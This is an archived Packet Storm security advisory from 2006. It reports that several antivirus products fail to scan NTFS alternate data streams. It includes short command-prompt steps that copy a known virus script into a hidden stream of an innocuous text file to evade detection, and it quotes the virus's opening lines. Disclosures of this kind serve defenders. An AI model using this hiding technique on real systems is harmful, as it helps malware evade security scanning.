exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ntfsstealth.txt

ntfsstealth.txt
Posted Jun 5, 2006
Authored by Joxean Koret

Various antivirus software, including Panda, ClamWin, Norman Virus Control, and AVG Antivirus are all susceptible to a bypass vulnerability.

tags | advisory, virus, bypass
SHA-256 | c76c390286fcb06d013752562c0285f7c4b1f845c3c50d9b7b0af3a425999224

ntfsstealth.txt

Change Mirror Download
Multiple Vendor NTFS Data Stream Malware Stealth Technique
----------------------------------------------------------

Affected product/vendors:

Panda Software. All products.
ClamWin. All versions.
Norman Virus Control. All versions.
AVG Antivirus.

Non-affected vendors:

Mcaffe / Computer Associates
Avira Antivir PersonalEdition Classic

Technique Description
----------------------

It isn't in any way a new technique, the first proof of concept of hidding malware into an NTFS
data stream was published at 2000. Apparently the technique wasn't so popular and due to this fact
the 75% (or more) of the anti-virus industry have been ignore it.

The technique is as simple as follow. Download a virus file, even an old one. Call it, in example,
'iloveyou.vbs'. Next, go to a command prompt:

------------------------------------------------------------------------------------------------------
C:\>echo I'm an inocent file. > file.txt

C:\>type file.txt
I'm an inocent file.

C:\>dir
Volume in drive C has no label.
Volume Serial Number is 8475-DDEF

Directory of C:\

06/03/2006 01:10 <DIR> Documents and Settings
03/06/2006 05:10 23 file.txt
03/06/2006 04:52 10.320 iloveyou.txt
03/06/2006 04:52 10.320 iloveyou.vbs
26/12/2005 00:51 <DIR> Inetpub
03/06/2006 05:09 <DIR> Program Files
29/05/2006 23:24 12 test1.vbs
03/06/2006 05:06 <DIR> WINNT
4 File(s) 20.675 bytes
4 Dir(s) 2.539.368.448 bytes free

C:\>type iloveyou.vbs > file.txt:virus.vbs

C:\>type file.txt
I'm an inocent file.

C:\>more < file.txt:virus.vbs
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
(...)
---More---
------------------------------------------------------------------------------------------------------


Now, try scanning your system with your preferred vulnerable antivirus product. The first file in a
normal data stream 'iloveyou.vbs' will (surely) be detected but not the copy of it stored in an alternate
data stream of the apparently innocent file c:\file.txt.


Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

---------------------------------------------------------------------------

Contact
-------

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close